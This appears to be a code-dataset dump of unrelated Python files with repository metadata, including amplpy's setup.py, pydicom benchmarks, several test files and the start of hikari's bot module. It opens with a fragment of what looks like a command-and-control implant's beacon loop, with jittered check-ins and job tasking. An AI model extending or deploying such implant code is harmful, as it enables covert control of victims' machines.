minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
| true
| true
|
f707a8a672d292d42d116e94949be97179511008
| 4,052
|
py
|
Python
|
setup.py
|
RogelioJCDiaz/AMPLpy
|
739c05cd399326f06711a089664d83ec08ccf1c0
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
RogelioJCDiaz/AMPLpy
|
739c05cd399326f06711a089664d83ec08ccf1c0
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
RogelioJCDiaz/AMPLpy
|
739c05cd399326f06711a089664d83ec08ccf1c0
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
AMPLPY
------
AMPL API is an interface that allows developers to access the features of the
AMPL interpreter from within a programming language. All model generation and
solver interaction is handled directly by AMPL, which leads to great stability
and speed; the library just acts as an intermediary, and the added overhead
(in terms of memory and CPU usage) depends mostly on how much data is read
back from AMPL; the size of the model as such is irrelevant. Functions for
directly assigning data to AMPL parameters and sets are provided, which can
be used instead of the normal AMPL data reading procedures. AMPL API has been
written with usability in mind, and it is easy to access its functionalities
from C++, Java, C#, MATLAB, R and Python.
The AMPL API can function as an add-on to any existing AMPL installation. If
you do not yet have an AMPL installation on the computer where you will be
working with the API, see our
`demo page <http://ampl.com/try-ampl/download-a-free-demo/>`_
or
`trial page <http://ampl.com/try-ampl/request-a-full-trial/>`_
to download a working version that can be installed quickly.
Documentation:
``````````````
* http://amplpy.readthedocs.io
* http://ampl.com/api/nightly/python/
Repositories:
`````````````
* GitHub Repository: https://github.com/ampl/amplpy
* PyPI Repository: https://pypi.python.org/pypi/amplpy
"""
from setuptools import setup, Extension
import platform
import os
OSTYPE = platform.system()
x64 = platform.architecture()[0] == '64bit'
def ls_dir(base_dir):
"""List files recursively."""
return [
os.path.join(dirpath.replace(base_dir, '', 1), f)
for (dirpath, dirnames, files) in os.walk(base_dir)
for f in files
]
def make_relative_rpath(path):
if OSTYPE == 'Darwin':
return '-Wl,-rpath,@loader_path/' + path
elif OSTYPE == 'Linux':
return '-Wl,-rpath,$ORIGIN/' + path
else:
return ''
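# e.g. on Linux, make_relative_rpath('amplpy/amplpython/lib64') yields
# '-Wl,-rpath,$ORIGIN/amplpy/amplpython/lib64', so the extension locates
# libampl relative to its own install location.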
def compile_args():
if OSTYPE == 'Windows':
        return ['/TP', '/EHsc']
elif OSTYPE == 'Linux':
return ['-std=c++11']
else:
return []
libdir = 'lib64' if x64 else 'lib32'
setup(
name='amplpy',
version='0.6.7',
description='Python API for AMPL',
long_description=__doc__,
license='BSD-3',
platforms='any',
author='Filipe Brandão',
author_email='fdabrandao@ampl.com',
url='http://ampl.com/',
download_url='https://github.com/ampl/amplpy',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Operating System :: Microsoft :: Windows',
'Programming Language :: C++',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
packages=['amplpy'],
ext_modules=[Extension(
'_amplpython',
libraries=['ampl'],
library_dirs=[os.path.join('amplpy', 'amplpython', libdir)],
include_dirs=[os.path.join('amplpy', 'amplpython', 'include')],
extra_compile_args=compile_args(),
extra_link_args=[
make_relative_rpath(os.path.join('amplpy', 'amplpython', libdir))
],
sources=[
os.path.join('amplpy', 'amplpython', 'amplpythonPYTHON_wrap.cxx')
],
)],
package_data={'': ls_dir('amplpy/')},
install_requires=['future >= 0.15.0']
)
| 32.416
| 78
| 0.641412
|
from setuptools import setup, Extension
import platform
import os
OSTYPE = platform.system()
x64 = platform.architecture()[0] == '64bit'
def ls_dir(base_dir):
return [
os.path.join(dirpath.replace(base_dir, '', 1), f)
for (dirpath, dirnames, files) in os.walk(base_dir)
for f in files
]
def make_relative_rpath(path):
if OSTYPE == 'Darwin':
return '-Wl,-rpath,@loader_path/' + path
elif OSTYPE == 'Linux':
return '-Wl,-rpath,$ORIGIN/' + path
else:
return ''
def compile_args():
if OSTYPE == 'Windows':
        return ['/TP', '/EHsc']
elif OSTYPE == 'Linux':
return ['-std=c++11']
else:
return []
libdir = 'lib64' if x64 else 'lib32'
setup(
name='amplpy',
version='0.6.7',
description='Python API for AMPL',
long_description=__doc__,
license='BSD-3',
platforms='any',
author='Filipe Brandão',
author_email='fdabrandao@ampl.com',
url='http://ampl.com/',
download_url='https://github.com/ampl/amplpy',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Topic :: Software Development',
'Topic :: Scientific/Engineering',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: Unix',
'Operating System :: MacOS',
'Operating System :: Microsoft :: Windows',
'Programming Language :: C++',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
],
packages=['amplpy'],
ext_modules=[Extension(
'_amplpython',
libraries=['ampl'],
library_dirs=[os.path.join('amplpy', 'amplpython', libdir)],
include_dirs=[os.path.join('amplpy', 'amplpython', 'include')],
extra_compile_args=compile_args(),
extra_link_args=[
make_relative_rpath(os.path.join('amplpy', 'amplpython', libdir))
],
sources=[
os.path.join('amplpy', 'amplpython', 'amplpythonPYTHON_wrap.cxx')
],
)],
package_data={'': ls_dir('amplpy/')},
install_requires=['future >= 0.15.0']
)
| true
| true
|
f707a9d2fe766b271f48e947fb3a4150371a8854
| 7,427
|
py
|
Python
|
BatchLabelMap/automatic/pydicom/benchmarks/bench_handler_numpy.py
|
weras2/BatchLabelMap
|
56af3d20df79f6b10a5d932278a33d02020d1e59
|
[
"MIT"
] | null | null | null |
BatchLabelMap/automatic/pydicom/benchmarks/bench_handler_numpy.py
|
weras2/BatchLabelMap
|
56af3d20df79f6b10a5d932278a33d02020d1e59
|
[
"MIT"
] | 1
|
2020-11-26T19:53:16.000Z
|
2020-11-26T19:53:16.000Z
|
BatchLabelMap/automatic/pydicom/benchmarks/bench_handler_numpy.py
|
weras2/BatchLabelMap
|
56af3d20df79f6b10a5d932278a33d02020d1e59
|
[
"MIT"
] | null | null | null |
# Copyright 2008-2018 pydicom authors. See LICENSE file for details.
"""Benchmarks for the numpy_handler module.
Requires asv and numpy.
"""
from platform import python_implementation
from tempfile import TemporaryFile
import numpy as np
from pydicom import dcmread
from pydicom.data import get_testdata_file
from pydicom.dataset import Dataset, FileMetaDataset
from pydicom.pixel_data_handlers.numpy_handler import get_pixeldata
from pydicom.uid import ExplicitVRLittleEndian, generate_uid
# 1/1, 1 sample/pixel, 1 frame
EXPL_1_1_1F = get_testdata_file("liver_1frame.dcm")
# 1/1, 1 sample/pixel, 3 frame
EXPL_1_1_3F = get_testdata_file("liver.dcm")
# 8/8, 1 sample/pixel, 1 frame
EXPL_8_1_1F = get_testdata_file("OBXXXX1A.dcm")
# 8/8, 1 sample/pixel, 2 frame
EXPL_8_1_2F = get_testdata_file("OBXXXX1A_2frame.dcm")
# 8/8, 3 sample/pixel, 1 frame
EXPL_8_3_1F = get_testdata_file("SC_rgb.dcm")
# 8/8, 3 sample/pixel, 1 frame, YBR_FULL_422
EXPL_8_3_1F_YBR422 = get_testdata_file('SC_ybr_full_422_uncompressed.dcm')
# 8/8, 3 sample/pixel, 2 frame
EXPL_8_3_2F = get_testdata_file("SC_rgb_2frame.dcm")
# 16/16, 1 sample/pixel, 1 frame
EXPL_16_1_1F = get_testdata_file("MR_small.dcm")
# 16/12, 1 sample/pixel, 10 frame
EXPL_16_1_10F = get_testdata_file("emri_small.dcm")
# 16/16, 3 sample/pixel, 1 frame
EXPL_16_3_1F = get_testdata_file("SC_rgb_16bit.dcm")
# 16/16, 3 sample/pixel, 2 frame
EXPL_16_3_2F = get_testdata_file("SC_rgb_16bit_2frame.dcm")
# 32/32, 1 sample/pixel, 1 frame
IMPL_32_1_1F = get_testdata_file("rtdose_1frame.dcm")
# 32/32, 1 sample/pixel, 15 frame
IMPL_32_1_15F = get_testdata_file("rtdose.dcm")
# 32/32, 3 sample/pixel, 1 frame
EXPL_32_3_1F = get_testdata_file("SC_rgb_32bit.dcm")
# 32/32, 3 sample/pixel, 2 frame
EXPL_32_3_2F = get_testdata_file("SC_rgb_32bit_2frame.dcm")
def _create_temporary_dataset(shape=(100, 1024, 1024, 3), bit_depth=16):
"""Function to create a temporary dataset for use in testing.
Parameters
----------
shape : 4-tuple
The (frames, rows, columns, channels) of the test dataset.
bit_depth : int
The BitsAllocated value to use for the dataset, one of 8, 16, 32, 64.
Returns
-------
tempfile.TemporaryFile
A created DICOM File Format conformant dataset.
"""
ds = Dataset()
ds.is_little_endian = True
ds.is_implicit_VR = False
ds.file_meta = FileMetaDataset()
ds.file_meta.TransferSyntaxUID = ExplicitVRLittleEndian
ds.SOPClassUID = '1.2.3.4'
ds.SOPInstanceUID = generate_uid()
ds.BitsAllocated = bit_depth
ds.PixelRepresentation = 0
ds.PlanarConfiguration = 0
ds.Rows = shape[1]
ds.Columns = shape[2]
ds.NumberOfFrames = shape[0]
ds.SamplesPerPixel = shape[3]
if shape[3] == 1:
ds.PhotometricInterpretation = 'MONOCHROME2'
elif shape[3] == 3:
ds.PhotometricInterpretation = 'RGB'
arr = np.zeros(shape, dtype='uint{}'.format(bit_depth))
ds.PixelData = arr.tobytes()
if len(ds.PixelData) % 2:
ds.PixelData += b'\x00'
tfile = TemporaryFile(mode='w+b')
ds.save_as(tfile, write_like_original=False)
tfile.seek(0)
return tfile
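# Usage sketch: dcmread(_create_temporary_dataset((10, 64, 64, 1), bit_depth=8))
# yields a small single-channel (MONOCHROME2) test dataset.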
class TimeGetPixelData_LargeDataset:
"""Time tests for numpy_handler.get_pixeldata with large datasets."""
def setup(self):
"""Setup the tests."""
self.no_runs = 100
self.ds_16_3_100 = dcmread(_create_temporary_dataset())
def time_large_dataset(self):
"""Time reading pixel data from a large dataset."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_100)
class TimeGetPixelData:
"""Time tests for numpy_handler.get_pixeldata."""
def setup(self):
"""Setup the tests."""
self.no_runs = 100
self.ds_1_1_1 = dcmread(EXPL_1_1_1F)
self.ds_1_1_3 = dcmread(EXPL_1_1_3F)
self.ds_8_1_1 = dcmread(EXPL_8_1_1F)
self.ds_8_1_2 = dcmread(EXPL_8_1_2F)
self.ds_8_3_1 = dcmread(EXPL_8_3_1F)
self.ds_8_3_2 = dcmread(EXPL_8_3_2F)
self.ds_16_1_1 = dcmread(EXPL_16_1_1F)
self.ds_16_1_10 = dcmread(EXPL_16_1_10F)
self.ds_16_3_1 = dcmread(EXPL_16_3_1F)
self.ds_16_3_2 = dcmread(EXPL_16_3_2F)
self.ds_32_1_1 = dcmread(IMPL_32_1_1F)
self.ds_32_1_15 = dcmread(IMPL_32_1_15F)
self.ds_32_3_1 = dcmread(EXPL_32_3_1F)
self.ds_32_3_2 = dcmread(EXPL_32_3_2F)
self.ds_ybr_422 = dcmread(EXPL_8_3_1F_YBR422)
def time_1bit_1sample_1frame(self):
"""Time retrieval of 1-bit, 1 sample/pixel, 1 frame."""
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_1)
def time_1bit_1sample_3frame(self):
"""Time retrieval of 1-bit, 1 sample/pixel, 3 frame."""
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_3)
def time_8bit_1sample_1frame(self):
"""Time retrieval of 8-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_1)
def time_8bit_1sample_2frame(self):
"""Time retrieval of 8-bit, 1 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_2)
def time_8bit_3sample_1frame(self):
"""Time retrieval of 8-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_1)
def time_8bit_3sample_2frame(self):
"""Time retrieval of 8-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_2)
def time_16bit_1sample_1frame(self):
"""Time retrieval of 16-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_1)
def time_16bit_1sample_10frame(self):
"""Time retrieval of 16-bit, 1 sample/pixel, 10 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_10)
def time_16bit_3sample_1frame(self):
"""Time retrieval of 16-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_1)
def time_16bit_3sample_2frame(self):
"""Time retrieval of 16-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_2)
def time_32bit_1sample_1frame(self):
"""Time retrieval of 32-bit, 1 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_1)
def time_32bit_1sample_15frame(self):
"""Time retrieval of 32-bit, 1 sample/pixel, 15 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_15)
def time_32bit_3sample_1frame(self):
"""Time retrieval of 32-bit, 3 sample/pixel, 1 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_1)
def time_32bit_3sample_2frame(self):
"""Time retrieval of 32-bit, 3 sample/pixel, 2 frame."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_2)
def time_ybr_422(self):
"""Time retrieval of YBR_FULL_422 data."""
for ii in range(self.no_runs):
get_pixeldata(self.ds_ybr_422)
| 34.544186
| 77
| 0.67497
|
from platform import python_implementation
from tempfile import TemporaryFile
import numpy as np
from pydicom import dcmread
from pydicom.data import get_testdata_file
from pydicom.dataset import Dataset, FileMetaDataset
from pydicom.pixel_data_handlers.numpy_handler import get_pixeldata
from pydicom.uid import ExplicitVRLittleEndian, generate_uid
EXPL_1_1_1F = get_testdata_file("liver_1frame.dcm")
EXPL_1_1_3F = get_testdata_file("liver.dcm")
EXPL_8_1_1F = get_testdata_file("OBXXXX1A.dcm")
EXPL_8_1_2F = get_testdata_file("OBXXXX1A_2frame.dcm")
EXPL_8_3_1F = get_testdata_file("SC_rgb.dcm")
EXPL_8_3_1F_YBR422 = get_testdata_file('SC_ybr_full_422_uncompressed.dcm')
EXPL_8_3_2F = get_testdata_file("SC_rgb_2frame.dcm")
EXPL_16_1_1F = get_testdata_file("MR_small.dcm")
EXPL_16_1_10F = get_testdata_file("emri_small.dcm")
EXPL_16_3_1F = get_testdata_file("SC_rgb_16bit.dcm")
EXPL_16_3_2F = get_testdata_file("SC_rgb_16bit_2frame.dcm")
IMPL_32_1_1F = get_testdata_file("rtdose_1frame.dcm")
IMPL_32_1_15F = get_testdata_file("rtdose.dcm")
EXPL_32_3_1F = get_testdata_file("SC_rgb_32bit.dcm")
EXPL_32_3_2F = get_testdata_file("SC_rgb_32bit_2frame.dcm")
def _create_temporary_dataset(shape=(100, 1024, 1024, 3), bit_depth=16):
ds = Dataset()
ds.is_little_endian = True
ds.is_implicit_VR = False
ds.file_meta = FileMetaDataset()
ds.file_meta.TransferSyntaxUID = ExplicitVRLittleEndian
ds.SOPClassUID = '1.2.3.4'
ds.SOPInstanceUID = generate_uid()
ds.BitsAllocated = bit_depth
ds.PixelRepresentation = 0
ds.PlanarConfiguration = 0
ds.Rows = shape[1]
ds.Columns = shape[2]
ds.NumberOfFrames = shape[0]
ds.SamplesPerPixel = shape[3]
if shape[3] == 1:
ds.PhotometricInterpretation = 'MONOCHROME2'
elif shape[3] == 3:
ds.PhotometricInterpretation = 'RGB'
arr = np.zeros(shape, dtype='uint{}'.format(bit_depth))
ds.PixelData = arr.tobytes()
if len(ds.PixelData) % 2:
ds.PixelData += b'\x00'
tfile = TemporaryFile(mode='w+b')
ds.save_as(tfile, write_like_original=False)
tfile.seek(0)
return tfile
class TimeGetPixelData_LargeDataset:
def setup(self):
self.no_runs = 100
self.ds_16_3_100 = dcmread(_create_temporary_dataset())
def time_large_dataset(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_100)
class TimeGetPixelData:
def setup(self):
self.no_runs = 100
self.ds_1_1_1 = dcmread(EXPL_1_1_1F)
self.ds_1_1_3 = dcmread(EXPL_1_1_3F)
self.ds_8_1_1 = dcmread(EXPL_8_1_1F)
self.ds_8_1_2 = dcmread(EXPL_8_1_2F)
self.ds_8_3_1 = dcmread(EXPL_8_3_1F)
self.ds_8_3_2 = dcmread(EXPL_8_3_2F)
self.ds_16_1_1 = dcmread(EXPL_16_1_1F)
self.ds_16_1_10 = dcmread(EXPL_16_1_10F)
self.ds_16_3_1 = dcmread(EXPL_16_3_1F)
self.ds_16_3_2 = dcmread(EXPL_16_3_2F)
self.ds_32_1_1 = dcmread(IMPL_32_1_1F)
self.ds_32_1_15 = dcmread(IMPL_32_1_15F)
self.ds_32_3_1 = dcmread(EXPL_32_3_1F)
self.ds_32_3_2 = dcmread(EXPL_32_3_2F)
self.ds_ybr_422 = dcmread(EXPL_8_3_1F_YBR422)
def time_1bit_1sample_1frame(self):
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_1)
def time_1bit_1sample_3frame(self):
no_runs = self.no_runs
if 'PyPy' in python_implementation():
no_runs = 1
for ii in range(no_runs):
get_pixeldata(self.ds_1_1_3)
def time_8bit_1sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_1)
def time_8bit_1sample_2frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_1_2)
def time_8bit_3sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_1)
def time_8bit_3sample_2frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_8_3_2)
def time_16bit_1sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_1)
def time_16bit_1sample_10frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_1_10)
def time_16bit_3sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_1)
def time_16bit_3sample_2frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_16_3_2)
def time_32bit_1sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_1)
def time_32bit_1sample_15frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_1_15)
def time_32bit_3sample_1frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_1)
def time_32bit_3sample_2frame(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_32_3_2)
def time_ybr_422(self):
for ii in range(self.no_runs):
get_pixeldata(self.ds_ybr_422)
| true
| true
|
f707aa7a0696a54e914ac4997aacd7f015e19161
| 279
|
py
|
Python
|
tests/artificial/transf_RelativeDifference/trend_Lag1Trend/cycle_12/ar_12/test_artificial_128_RelativeDifference_Lag1Trend_12_12_0.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
tests/artificial/transf_RelativeDifference/trend_Lag1Trend/cycle_12/ar_12/test_artificial_128_RelativeDifference_Lag1Trend_12_12_0.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | 1
|
2019-11-30T23:39:38.000Z
|
2019-12-01T04:34:35.000Z
|
tests/artificial/transf_RelativeDifference/trend_Lag1Trend/cycle_12/ar_12/test_artificial_128_RelativeDifference_Lag1Trend_12_12_0.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N=128, FREQ='D', seed=0, trendtype="Lag1Trend", cycle_length=12, transform="RelativeDifference", sigma=0.0, exog_count=0, ar_order=12)
| 39.857143
| 174
| 0.741935
|
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N=128, FREQ='D', seed=0, trendtype="Lag1Trend", cycle_length=12, transform="RelativeDifference", sigma=0.0, exog_count=0, ar_order=12)
| true
| true
|
f707ab8c58c89f5eab4c2f3f9d38c22b4c2ce795
| 167
|
py
|
Python
|
test_whats.py
|
shispt/whats
|
f1b266432bf90723e30afdad4d5df7b6e26beade
|
[
"MIT"
] | 3
|
2017-06-09T19:00:19.000Z
|
2017-06-13T01:24:32.000Z
|
test_whats.py
|
shispt/whats
|
f1b266432bf90723e30afdad4d5df7b6e26beade
|
[
"MIT"
] | 3
|
2017-06-08T02:21:07.000Z
|
2017-06-19T16:46:00.000Z
|
test_whats.py
|
shispt/whats
|
f1b266432bf90723e30afdad4d5df7b6e26beade
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from whats import whats
def test_tellme():
assert whats.tellme('美妙的新世界')
| 15.181818
| 39
| 0.706587
|
from __future__ import unicode_literals
from whats import whats
def test_tellme():
assert whats.tellme('美妙的新世界')
| true
| true
|
f707ac7a357deba1360d4b63d98ae3014f9e3825
| 3,393
|
py
|
Python
|
tests/test_data.py
|
kuanhc96/decanter-ai-core-sdk
|
74300f56b690feac1737c89a0630582ba5daa1fd
|
[
"MIT"
] | 3
|
2021-01-20T08:54:27.000Z
|
2021-07-13T08:53:38.000Z
|
tests/test_data.py
|
kuanhc96/decanter-ai-core-sdk
|
74300f56b690feac1737c89a0630582ba5daa1fd
|
[
"MIT"
] | 5
|
2020-08-14T17:49:25.000Z
|
2021-07-15T06:25:04.000Z
|
tests/test_data.py
|
kuanhc96/decanter-ai-core-sdk
|
74300f56b690feac1737c89a0630582ba5daa1fd
|
[
"MIT"
] | 4
|
2020-08-14T07:24:19.000Z
|
2021-10-06T05:21:00.000Z
|
# pylint: disable=redefined-builtin
# pylint: disable=too-many-arguments
"""Test related method and functionality of Context."""
import pytest
import responses
from decanter.core import Context
from decanter.core.core_api import TrainInput
from decanter.core.extra import CoreStatus
from decanter.core.jobs import DataUpload
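# fail_conds pairs every failing core status with both a missing (None) and a
# present ('result') payload, plus the inconsistent case of a DONE status
# with no result.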
fail_conds = [(stat, res) for stat in CoreStatus.FAIL_STATUS for res in [None, 'result']]
fail_conds.append((CoreStatus.DONE, None))
@responses.activate
def test_data_success(
globals, client, mock_test_responses, context_fixture):
"""DataUpload gets the id and result when upload csv file or datafram."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=CoreStatus.DONE)
data = client.upload(file=globals['test_csv_file'])
data_ = client.upload(file=globals['test_df'])
context.run()
assert data.task.id == data_.task.id == globals['upload']
assert data.id == data_.id == globals['data']
assert data.status == data_.status == CoreStatus.DONE
assert data.result == data_.result == globals['results']['upload']
@responses.activate
@pytest.mark.parametrize('status, result', fail_conds)
def test_data_fail(
globals, client, status, result, mock_test_responses, context_fixture):
"""DataUpload fails when status and result create fail conditions."""
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status, task_result=result)
data = client.upload(file=globals['test_csv_file'])
context.run()
assert data.task.id == globals['upload']
assert data.id is None
assert data.status == status
assert data.result == result
@responses.activate
def test_no_file(client, mock_test_responses, context_fixture):
"""Raise exceptions when upload empty files."""
context_fixture('Healthy')
mock_test_responses(task='upload')
with pytest.raises(Exception):
client.upload(file=None)
@responses.activate
@pytest.mark.parametrize('status', [CoreStatus.PENDING, CoreStatus.RUNNING, CoreStatus.FAIL])
def test_data_stop(
globals, urls, client, status, mock_test_responses, context_fixture):
"""DataUpload status is fail if stopped during pending, running, and fail status,
remains if in done status. The experiment following will failed if data
failed.
"""
async def cancel(data):
data.stop()
return
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status)
mock_test_responses(task='train', status=CoreStatus.DONE)
responses.add(
responses.PUT, urls('stop', 'upload'),
json={
'message': 'task removed'
},
status=200,
content_type='application/json')
if status == CoreStatus.DONE:
data = DataUpload()
data.status = CoreStatus.DONE
else:
data = client.upload(file=globals['test_csv_file'])
exp = client.train(TrainInput(
data=data, target='test-target', algos=['test-algo']))
cancel_task = Context.LOOP.create_task(cancel(data))
Context.CORO_TASKS.append(cancel_task)
context.run()
if status == CoreStatus.DONE:
assert data.status == CoreStatus.DONE
assert exp.status == CoreStatus.DONE
else:
assert data.status == CoreStatus.FAIL
assert exp.status == CoreStatus.FAIL
| 35.715789
| 93
| 0.703212
|
import pytest
import responses
from decanter.core import Context
from decanter.core.core_api import TrainInput
from decanter.core.extra import CoreStatus
from decanter.core.jobs import DataUpload
fail_conds = [(stat, res) for stat in CoreStatus.FAIL_STATUS for res in [None, 'result']]
fail_conds.append((CoreStatus.DONE, None))
@responses.activate
def test_data_success(
globals, client, mock_test_responses, context_fixture):
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=CoreStatus.DONE)
data = client.upload(file=globals['test_csv_file'])
data_ = client.upload(file=globals['test_df'])
context.run()
assert data.task.id == data_.task.id == globals['upload']
assert data.id == data_.id == globals['data']
assert data.status == data_.status == CoreStatus.DONE
assert data.result == data_.result == globals['results']['upload']
@responses.activate
@pytest.mark.parametrize('status, result', fail_conds)
def test_data_fail(
globals, client, status, result, mock_test_responses, context_fixture):
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status, task_result=result)
data = client.upload(file=globals['test_csv_file'])
context.run()
assert data.task.id == globals['upload']
assert data.id is None
assert data.status == status
assert data.result == result
@responses.activate
def test_no_file(client, mock_test_responses, context_fixture):
context_fixture('Healthy')
mock_test_responses(task='upload')
with pytest.raises(Exception):
client.upload(file=None)
@responses.activate
@pytest.mark.parametrize('status', [CoreStatus.PENDING, CoreStatus.RUNNING, CoreStatus.FAIL])
def test_data_stop(
globals, urls, client, status, mock_test_responses, context_fixture):
async def cancel(data):
data.stop()
return
context = context_fixture('Healthy')
mock_test_responses(task='upload', status=status)
mock_test_responses(task='train', status=CoreStatus.DONE)
responses.add(
responses.PUT, urls('stop', 'upload'),
json={
'message': 'task removed'
},
status=200,
content_type='application/json')
if status == CoreStatus.DONE:
data = DataUpload()
data.status = CoreStatus.DONE
else:
data = client.upload(file=globals['test_csv_file'])
exp = client.train(TrainInput(
data=data, target='test-target', algos=['test-algo']))
cancel_task = Context.LOOP.create_task(cancel(data))
Context.CORO_TASKS.append(cancel_task)
context.run()
if status == CoreStatus.DONE:
assert data.status == CoreStatus.DONE
assert exp.status == CoreStatus.DONE
else:
assert data.status == CoreStatus.FAIL
assert exp.status == CoreStatus.FAIL
| true
| true
|
f707ad48d655f5a1de6caf6b6c93f8f68adf554c
| 59,087
|
py
|
Python
|
hikari/impl/bot.py
|
CircuitSacul/hikari
|
67671075dbe45095ac56c66ee5a5859d0e124df8
|
[
"MIT"
] | null | null | null |
hikari/impl/bot.py
|
CircuitSacul/hikari
|
67671075dbe45095ac56c66ee5a5859d0e124df8
|
[
"MIT"
] | null | null | null |
hikari/impl/bot.py
|
CircuitSacul/hikari
|
67671075dbe45095ac56c66ee5a5859d0e124df8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# cython: language_level=3
# Copyright (c) 2020 Nekokatt
# Copyright (c) 2021-present davfsa
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Basic implementation the components for a single-process bot."""
from __future__ import annotations
__all__: typing.List[str] = ["GatewayBot"]
import asyncio
import datetime
import logging
import math
import signal
import sys
import threading
import traceback
import types
import typing
import warnings
from hikari import applications
from hikari import errors
from hikari import intents as intents_
from hikari import presences
from hikari import snowflakes
from hikari import traits
from hikari import undefined
from hikari.impl import cache as cache_impl
from hikari.impl import config as config_impl
from hikari.impl import entity_factory as entity_factory_impl
